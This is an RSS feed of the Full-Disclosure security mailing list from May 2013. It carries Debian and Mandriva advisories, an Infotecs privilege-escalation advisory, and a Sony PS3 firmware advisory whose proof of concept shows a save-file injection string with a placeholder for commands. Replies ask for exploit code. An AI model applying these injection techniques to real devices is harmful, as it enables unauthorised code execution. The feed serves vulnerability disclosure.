<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/">
  <channel rdf:about="http://blog.gmane.org/gmane.comp.security.full-disclosure">
    <title>gmane.comp.security.full-disclosure</title>
    <link>http://blog.gmane.org/gmane.comp.security.full-disclosure</link>
    <description/>
    <syn:updatePeriod>hourly</syn:updatePeriod>
    <syn:updateFrequency>1</syn:updateFrequency>
    <syn:updateBase>1901-01-01T00:00+00:00</syn:updateBase>
    <items>
      <rdf:Seq>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89380"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89379"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89378"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89377"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89376"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89375"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89374"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89373"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89372"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89371"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89370"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89369"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89368"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89367"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89366"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89365"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89364"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89363"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89362"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89361"/>
      </rdf:Seq>
    </items>
    <image rdf:resource="http://gmane.org/img/gmane-25t.png"/>
    <textinput rdf:resource=""/>
  </channel>
  <image rdf:about="http://gmane.org/img/gmane-25t.png">
    <title>Gmane</title>
    <url>http://gmane.org/img/gmane-25t.png</url>
    <link>http://gmane.org</link>
  </image>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89380">
    <title>[SECURITY] [DSA 2672-1] kfreebsd-9 security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89380</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2672-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                            Florian Weimer
May 22, 2013                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : kfreebsd-9
Vulnerability  : interpretation conflict
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-3266
Debian Bug     : 706414

Adam Nowacki discovered that the new FreeBSD NFS implementation
processes a crafted READDIR request which instructs to operate a file
system on a file node as if it were a directory node, leading to a
kernel crash or potentially arbitrary code execution.

The kfreebsd-8 kernel in the oldstable distribution (squeeze) does not
enable the new NFS implementation.  The Linux kernel is not affected
by this vulnerability.

For the stable distribution (wheezy), this problem has been fixed in
version 9.0-10+deb70.1.

For the testing distribution (jessie) and the unstable distribution
(sid), this problem has been fixed in version 9.0-11.

We recommend that you upgrade your kfreebsd-9 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce&amp;lt; at &amp;gt;lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJRnSBsAAoJEL97/wQC1SS+AUIH/37RK8Rss3gXBRYRjv91NnkU
TEPe22SEIPegeqNCP5XAP/zBC6aNy8O9KbcRE9P+D+nVQKj61lnX3NuF83dNUHVt
ni1sc7SijlQ7TIFe9pMVAphRAC04qkkHGJmBzte10G2Wgl7o8o9o9bbKHGHZB+TK
v4x0sZuhi3WObmOy5sOKSeeH40LnpSRAo5JrSEvAIWlzrn/KLoovTsFIltoMMS8l
0CSilidE638w+GwZQNzX2GDFrOmzi5w4BI0OoUCGybsPL/3M18/dspdrZ/4XTGuK
UsRbZDKDbOk7Ww+Ld1Y/DSsTDlequsj6YaKEHy6shB0ehWzgVS3MbK6yfl6Z2Bk=
=mqZx
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

&lt;/pre&gt;</description>
    <dc:creator>Florian Weimer</dc:creator>
    <dc:date>2013-05-22T19:18:46</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89379">
    <title>[SECURITY] [DSA 2671-1] request-tracker4 security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89379</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2671-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
May 22, 2013                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : request-tracker4
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-4733 CVE-2013-3368 CVE-2013-3369 CVE-2013-3370 
                 CVE-2013-3371 CVE-2013-3372 CVE-2013-3373 CVE-2013-3374

Multiple vulnerabilities have been discovered in Request Tracker, an
extensible trouble-ticket tracking system. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2012-4733

    A user with the ModifyTicket right can bypass the DeleteTicket right
    or any custom lifecycle transition rights and thus modify ticket data
    without authorization.

CVE-2013-3368

    The rt command line tool uses semi-predictable temporary files. A
    malicious user can use this flaw to overwrite files with permissions
    of the user running the rt command line tool.

CVE-2013-3369

    A malicious user who is allowed to see administration pages can run
    arbitrary mason components (without control of arguments), which may
    have negative side-effects.

CVE-2013-3370

    Request Tracker allows direct requests to private callback
    components, which could be used to exploit a Request Tracker
    extension or a local callback which uses the arguments passed to it
    insecurely.

CVE-2013-3371

    Request Tracker is vulnerable to cross-site scripting attacks via
    attachment filenames.

CVE-2013-3372

    Dominic Hargreaves discovered that Request Tracker is vulnerable to
    an HTTP header injection limited to the value of the
    Content-Disposition header.

CVE-2013-3373

    Request Tracker is vulnerable to a MIME header injection in outgoing
    email generated by Request Tracker.

    Request Tracker stock templates are resolved by this update. But any
    custom email templates should be updated to ensure that values
    interpolated into mail headers do not contain newlines.

CVE-2013-3374

    Request Tracker is vulnerable to limited session re-use when using
    the file-based session store, Apache::Session::File. However Request
    Tracker's default session configuration only uses
    Apache::Session::File when configured for Oracle databases.

This version of Request Tracker includes a database content upgrade. If
you are using a dbconfig-managed database, you will be offered the
choice of applying this automatically. Otherwise see the explanation in
/usr/share/doc/request-tracker4/NEWS.Debian.gz for the manual steps to
perform.

Please note that if you run request-tracker4 under the Apache web
server, you must stop and start Apache manually. The "restart" mechanism
is not recommended, especially when using mod_perl or any form of
persistent perl process such as FastCGI or SpeedyCGI.

For the stable distribution (wheezy), these problems have been fixed in
version 4.0.7-5+deb7u2.

For the testing distribution (jessie), these problems will be fixed
soon.

For the unstable distribution (sid), these problems have been fixed in
version 4.0.12-2.

We recommend that you upgrade your request-tracker4 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce&amp;lt; at &amp;gt;lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
=3Swv
-----END PGP SIGNATURE-----

&lt;/pre&gt;</description>
    <dc:creator>Salvatore Bonaccorso</dc:creator>
    <dc:date>2013-05-22T19:45:55</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89378">
    <title>[SECURITY] [DSA 2670-1] request-tracker3.8 security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89378</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2670-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
May 22, 2013                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : request-tracker3.8
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-3368 CVE-2013-3369 CVE-2013-3370 CVE-2013-3371 
                 CVE-2013-3372 CVE-2013-3373 CVE-2013-3374

Multiple vulnerabilities have been discovered in Request Tracker, an
extensible trouble-ticket tracking system. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2013-3368

    The rt command line tool uses semi-predictable temporary files. A
    malicious user can use this flaw to overwrite files with permissions
    of the user running the rt command line tool.

CVE-2013-3369

    A malicious user who is allowed to see administration pages can run
    arbitrary mason components (without control of arguments), which may
    have negative side-effects.

CVE-2013-3370

    Request Tracker allows direct requests to private callback
    components, which could be used to exploit a Request Tracker
    extension or a local callback which uses the arguments passed to it
    insecurely.

CVE-2013-3371

    Request Tracker is vulnerable to cross-site scripting attacks via
    attachment filenames.

CVE-2013-3372

    Dominic Hargreaves discovered that Request Tracker is vulnerable to
    an HTTP header injection limited to the value of the
    Content-Disposition header.

CVE-2013-3373

    Request Tracker is vulnerable to a MIME header injection in outgoing
    email generated by Request Tracker.

    Request Tracker stock templates are resolved by this update. But any
    custom email templates should be updated to ensure that values
    interpolated into mail headers do not contain newlines.

CVE-2013-3374

    Request Tracker is vulnerable to limited session re-use when using
    the file-based session store, Apache::Session::File. However Request
    Tracker's default session configuration only uses
    Apache::Session::File when configured for Oracle databases.

This version of Request Tracker includes a database content upgrade. If
you are using a dbconfig-managed database, you will be offered the
choice of applying this automatically. Otherwise see the explanation in
/usr/share/doc/request-tracker3.8/NEWS.Debian.gz for the manual steps to
perform.

Please note that if you run request-tracker3.8 under the Apache web
server, you must stop and start Apache manually. The "restart" mechanism
is not recommended, especially when using mod_perl or any form of
persistent perl process such as FastCGI or SpeedyCGI.

For the oldstable distribution (squeeze), these problems have been fixed in
version 3.8.8-7+squeeze7.

The stable, testing and unstable distributions no longer contain
request-tracker3.8, which is replaced by request-tracker4.

We recommend that you upgrade your request-tracker3.8 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce&amp;lt; at &amp;gt;lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
=nyOW
-----END PGP SIGNATURE-----

&lt;/pre&gt;</description>
    <dc:creator>Salvatore Bonaccorso</dc:creator>
    <dc:date>2013-05-22T19:11:30</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89377">
    <title>Re: Sony PS3 Firmware v4.31 - Code Execution Vulnerability</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89377</link>
    <description>&lt;pre&gt;Hi,


didn't test the POC yet, but I guess the fun is here:


Injecting system commands..


&lt;/pre&gt;</description>
    <dc:creator>Milan Berger</dc:creator>
    <dc:date>2013-05-22T14:23:42</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89376">
    <title>Pentesting Distributions or Projects for Raspberry Pi</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89376</link>
    <description>&lt;pre&gt;Hey there guys,

Do you know other projects, distributions, and installer kits for Raspberry
PI aside from the distributions and kits mentioned in this article:
http://resources.infosecinstitute.com/pentesting-distributions-and-installer-kits-for-your-raspberry-pi/
 ?

I am very much interested in trying out new projects :)

Also lately I have been addicted to RetroPie (
https://github.com/petrockblog/RetroPie-Setup) ahahhaha although it is not
related to security really but I just love emulating some cool and classic
games from SNES.

Regards,

Jay Turla
http://resources.infosecinstitute.com/author/jay-turla/
&lt;/pre&gt;</description>
    <dc:creator>Jay Turla</dc:creator>
    <dc:date>2013-05-21T16:13:53</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89375">
    <title>Re: Sony PS3 Firmware v4.31 - Code Execution Vulnerability</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89375</link>
    <description>&lt;pre&gt;So, wanna tell me what exactly is critical about you being able to inject
marquee tags into your savefile names?


2013/5/21 Vulnerability Lab &amp;lt;research&amp;lt; at &amp;gt;vulnerability-lab.com&amp;gt;

&lt;/pre&gt;</description>
    <dc:creator>Julius Kivimäki</dc:creator>
    <dc:date>2013-05-21T15:29:34</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89374">
    <title>Re: exploitation ideas under memory pressure</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89374</link>
    <description>&lt;pre&gt;Hey Tavis,

very interesting work! You're right: the list is getting worse every year.
So keep going!!!


2013/5/20 Tavis Ormandy &amp;lt;taviso&amp;lt; at &amp;gt;cmpxchg8b.com&amp;gt;

&lt;/pre&gt;</description>
    <dc:creator>You Got Pwned</dc:creator>
    <dc:date>2013-05-21T18:09:27</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89373">
    <title>Re: exploitation ideas under memory pressure</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89373</link>
    <description>&lt;pre&gt;In the good spirit of full disclosure, we would appreciate some exploit code.
&lt;/pre&gt;</description>
    <dc:creator>Brian Blankenship</dc:creator>
    <dc:date>2013-05-22T03:00:40</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89372">
    <title>[ MDVSA-2013:166 ] krb5</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89372</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:166
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : krb5
 Date    : May 21, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered and corrected in krb5:
 
 The kpasswd service provided by kadmind was vulnerable to a UDP
 ping-pong attack (CVE-2002-2443).
 
 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443
 https://bugzilla.redhat.com/show_bug.cgi?id=962531
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:
 762c01ff4ce813cd3c5acce794c29aa3  mes5/i586/krb5-1.8.1-0.11mdvmes5.2.i586.rpm
 415beef49e20f8b89c84b0270afbf1d6  mes5/i586/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.i586.rpm
 a6bd6778ab49710b1a50633555b0dc27  mes5/i586/krb5-server-1.8.1-0.11mdvmes5.2.i586.rpm
 497cfca620c25dd7ce523a61afdccc5e  mes5/i586/krb5-server-ldap-1.8.1-0.11mdvmes5.2.i586.rpm
 2fe4670b52795e8c74f53e7eee826c2c  mes5/i586/krb5-workstation-1.8.1-0.11mdvmes5.2.i586.rpm
 22926f634ea6ba5f816c14a2e30cc38a  mes5/i586/libkrb53-1.8.1-0.11mdvmes5.2.i586.rpm
 477f8f61cd9c8e577cd6797e850978ce  mes5/i586/libkrb53-devel-1.8.1-0.11mdvmes5.2.i586.rpm 
 77c66246600b71f6471f75054e886cd4  mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 1cab52ff4c719378b97ec3acbc7d911f  mes5/x86_64/krb5-1.8.1-0.11mdvmes5.2.x86_64.rpm
 b5d51d32e5eaa96ab973e5ce151a5254  mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.x86_64.rpm
 6218fc79250aaec5c7ca19b193fdb8dc  mes5/x86_64/krb5-server-1.8.1-0.11mdvmes5.2.x86_64.rpm
 88de99aa8cde8adaee672c265292a355  mes5/x86_64/krb5-server-ldap-1.8.1-0.11mdvmes5.2.x86_64.rpm
 39791a90573b4de08efdaf0193bbc5dc  mes5/x86_64/krb5-workstation-1.8.1-0.11mdvmes5.2.x86_64.rpm
 846b75578bb5559cfcf7aa2ce9e43156  mes5/x86_64/lib64krb53-1.8.1-0.11mdvmes5.2.x86_64.rpm
 7351a8d2be13df25ab9c2534489a2da0  mes5/x86_64/lib64krb53-devel-1.8.1-0.11mdvmes5.2.x86_64.rpm 
 77c66246600b71f6471f75054e886cd4  mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 3150d604a21be2373d223457da156734  mbs1/x86_64/krb5-1.9.2-3.3.mbs1.x86_64.rpm
 52729f0759e686cfdf5f9c99efc28862  mbs1/x86_64/krb5-pkinit-openssl-1.9.2-3.3.mbs1.x86_64.rpm
 4b997282ad6dd76eb7a10f07809bef71  mbs1/x86_64/krb5-server-1.9.2-3.3.mbs1.x86_64.rpm
 b10b3c0211e071ab93e818db684098f9  mbs1/x86_64/krb5-server-ldap-1.9.2-3.3.mbs1.x86_64.rpm
 417d23306554b1d7d290e8d3fed1a2d8  mbs1/x86_64/krb5-workstation-1.9.2-3.3.mbs1.x86_64.rpm
 a17c8e2438c0415c9ea478bcc0715101  mbs1/x86_64/lib64krb53-1.9.2-3.3.mbs1.x86_64.rpm
 2d05c4ac4b44be10ea1e3d4337689512  mbs1/x86_64/lib64krb53-devel-1.9.2-3.3.mbs1.x86_64.rpm 
 95305e2323d63546e970538b7d692447  mbs1/SRPMS/krb5-1.9.2-3.3.mbs1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  &amp;lt;security*mandriva.com&amp;gt;
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFRm3ZlmqjQ0CJFipgRAmRWAJ42vFSB5f9jXtt3hRarBQpqxARd/ACfa9qv
esFWMrXe/0P1/wv2ag87c6w=
=Lg3K
-----END PGP SIGNATURE-----

&lt;/pre&gt;</description>
    <dc:creator>security&lt; at &gt;mandriva.com</dc:creator>
    <dc:date>2013-05-21T16:34:00</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89371">
    <title>Re: exploitation ideas under memory pressure</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89371</link>
    <description>&lt;pre&gt;Interesting idea to create a thread and patch the list. Upon reading your first post, I immediately thought this wasn't going to be exploitable, you've proven me wrong. Any chance for a copy of the exploit code? I might port it to Metasploit.

sd

&lt;/pre&gt;</description>
    <dc:creator>sd</dc:creator>
    <dc:date>2013-05-21T03:14:32</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89370">
    <title>CVE-2013-3496. Local privilege escalation vulnerability in Infotecs products (ViPNet Client\Coordinator, SafeDisk, Personal Firewall)</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89370</link>
    <description>&lt;pre&gt;CVE-2013-3496. Local privilege escalation vulnerability in Infotecs
products (ViPNet Client\Coordinator, SafeDisk, Personal Firewall)

CVE reference:
CVE-2013-3496

Credit:
Maksim Chudakov (&amp;lt; at &amp;gt;MChudakov)
Andrey Kurtasanov(andreykurtasanov&amp;lt; at &amp;gt;gmail.com)

Severity:
Medium

Local\Remote:
Local

Vulnerability Class:
Privilege Escalation

Vendor URL:
http://www.infotecs.biz/

Affected OS:
Windows

Vulnerable systems:
ViPNet Client 3.2.10 (15632) and prior
ViPNet Coordinator 3.2.10 (15632) and prior
ViPNet SafeDisk 4.1 (0.5643) and prior
VipNet Personal Firewall 3.1 and prior
Possibly same issues in other Infotecs products and other versions

Overview:
A local privilege escalation vulnerability exists in the Infotecs
products (ViPNet Client, SafeDisk, Personal Firewall and possibly
other products), which could be exploited by an attacker to execute
commands on the affected machine under the context of the SYSTEM user
or user with local administrative privileges.

Technical Background:
The vulnerability exists because Infotecs products install to a folder
with insecure permissions. The "Everyone" group has "Full Control" rights
to the files/folders in the following path: "%Program
Files%\Infotecs\[product_name]". It means that any unprivileged user
can modify, delete or change permissions of any file in the folder,
which consists of data, executable and configuration files.

Solution:
1) Request a patch from Vendor or
2) Go to every executable and dll file within a ViPNet folder and
change permissions manually

Disclosure Timeline:
25/03/2013 Initial vendor notification
08/04/2013 Vendor response that patches have been released
20/05/2013 Advisory released

&lt;/pre&gt;</description>
    <dc:creator>Максим Чудаков</dc:creator>
    <dc:date>2013-05-21T06:37:10</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89369">
    <title>Sony PS3 Firmware v4.31 - Code Execution Vulnerability</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89369</link>
    <description>&lt;pre&gt;Title:
======
Sony PS3 Firmware v4.31 - Code Execution Vulnerability


Date:
=====
2013-05-12


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=767


VL-ID:
=====
767


Common Vulnerability Scoring System:
====================================
6.5


Introduction:
=============
The PlayStation 3 is the third home video game console produced by Sony Computer Entertainment and the successor to the 
PlayStation 2 as part of the PlayStation series. The PlayStation 3 competes with Microsoft`s Xbox 360 and Nintendo`s Wii 
as part of the seventh generation of video game consoles. It was first released on November 11, 2006, in Japan, with 
international markets following shortly thereafter.

Major features of the console include its unified online gaming service, the PlayStation Network, its multimedia capabilities, 
connectivity with the PlayStation Portable, and its use of the Blu-ray Disc as its primary storage medium.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_3 )


PlayStation Network, often abbreviated as PSN, is an online multiplayer gaming and digital media delivery service provided/run 
by Sony Computer Entertainment for use with the PlayStation 3, PlayStation Portable, and PlayStation Vita video game consoles. 
The PlayStation Network is the video game portion of the Sony Entertainment Network.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_Network)


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Playstation3 v4.31 Firmware.


Report-Timeline:
================
2012-10-26:Researcher Notification &amp;amp; Coordination
2012-11-18:Vendor Notification 1
2012-12-14:Vendor Notification 2
2012-01-18:Vendor Notification 3
2012-**-**:Vendor Response/Feedback
2012-05-01:Vendor Fix/Patch by Check
2012-05-13:Public Disclosure


Status:
========
Published


Affected Products:
==================
Sony
Product: Playstation 3 4.31


Exploitation-Technique:
=======================
Local


Severity:
=========
High


Details:
========
A local code execution vulnerability is detected in the official Playstation3 v4.31 Firmware. 
The vulnerability allows local attackers to inject and execute code out of vulnerable ps3 menu main web context. 

There are 3 types of save games for the sony ps3. The report is only bound to the .sfo save games of the Playstation3.
The ps3 save games sometimes use a PARAM.SFO file in the folder (USB or PS3 HD) to display movable text like marquees, 
in combination with a video, sound and the (path) background picture. Normally the ps3 firmware parses the redisplayed 
save game values &amp;amp; detail information text when processing to load it via usb/ps3-hd. The import ps3 preview filtering 
can be bypassed via a split char-by-char injection of script code or system (ps3 firmware) specific commands.

The attacker synchronizes his computer (to change the usb context) with USB (Save Game) and connects to the network 
(USB, COMPUTER, PS3), updates the save game via computer and can execute the context directly out of the ps3 savegame preview 
listing menu (SUB/HD). The exploitation requires local system access, a manipulated .sfo file and a USB device. The attacker 
can only use the given byte size of the saved string (attribute values) to inject his own commands or script code.

The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not recognize special chars and does not provide 
any kind of input restrictions. Attackers can manipulate the .sfo file of a save game to execute system specific commands 
or inject malicious persistent script code.

Successful exploitation of the vulnerability can result in persistent but local system command executions, psn session 
hijacking, persistent phishing attacks, external redirect out of the vulnerable module, stable persistent save game preview 
listing context manipulation.


Vulnerable Section(s):
[+] PS Menu &amp;gt; Game (Spiel)

Vulnerable Module(s):
[+] SpeicherDaten (DienstProgramm) PS3 &amp;gt; USB Gerät

Affected Section(s):
[+] Title - Save Game Preview Resource (Detail Listing)


Proof of Concept:
=================
The firmware preview listing validation vulnerability can be exploited by local attackers and with low or medium required user interaction.
For demonstration or reproduce ...

The attacker needs to sync his computer (to change the usb context) with USB (Save Game) and connect to the network
(USB, COMPUTER, +PS3), update the save game via computer and can then execute the context directly out of the ps3 savegame preview 
listing menu (SUB/HD). The exploitation requires local system access, a manipulated .sfo file and a USB device. The attacker 
can only use the given byte size of the saved string (attribute values) to inject his own commands or script code.

The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not recognize special chars and does not provide 
any kind of input restrictions. Attackers can manipulate the .sfo file of a save game to execute system specific commands 
or inject malicious persistent script code out of the save game preview listing.

If you inject standard frames or system unknown commands (jailbreak) without passing the filter char by char and direct sync 
as update, you will fail to reproduce! 

PoC: PARAM.SFO

ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE    
40ac78551a88fdc    
SD  
PSHACK: Benjamin Ninja H%20'&amp;gt;"&amp;lt;[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!]

Hackizeit: 1:33:07

ExpSkills: VL-LAB-TRAINING

Operation: 1%
Trojaners: 0%
... Õõ~\˜òíA×éú;óç    40ac78551a88fdc
...
BLES00371-NARUTO_STORM-0
HACKINGBKM 1
PSHACK: Benjamin Ninja H%20'&amp;gt;"&amp;lt;[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!];



Solution:
=========
Restrict the savegame name input and disallow special chars.
Encode the savegame values when redisplaying them in the menu preview of the game.
Parse the strings and values from the savegames even if they are included string by string via sync.


Risk:
=====
The security risk of the highly exploitable but local vulnerability is estimated as critical and needs to be fixed soon.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri  (bkm&amp;lt; at &amp;gt;vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   - www.vuln-lab.com       - www.vulnerability-lab.com/register
Contact:    admin&amp;lt; at &amp;gt;vulnerability-lab.com - support&amp;lt; at &amp;gt;vulnerability-lab.com        - research&amp;lt; at &amp;gt;vulnerability-lab.com
Section:    video.vulnerability-lab.com - forum.vulnerability-lab.com        - news.vulnerability-lab.com
Social:    twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab        - youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team &amp;amp; the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin&amp;lt; at &amp;gt;vulnerability-lab.com or support&amp;lt; at &amp;gt;vulnerability-lab.com) to get a permission.

       Copyright © 2013 | Vulnerability Laboratory

&lt;/pre&gt;</description>
    <dc:creator>Vulnerability Lab</dc:creator>
    <dc:date>2013-05-20T23:32:57</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89368">
    <title>Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89368</link>
    <description>&lt;pre&gt;Title:
======
Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities


Date:
=====
2013-05-21


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=894

Article: http://www.vulnerability-lab.com/dev/?p=580

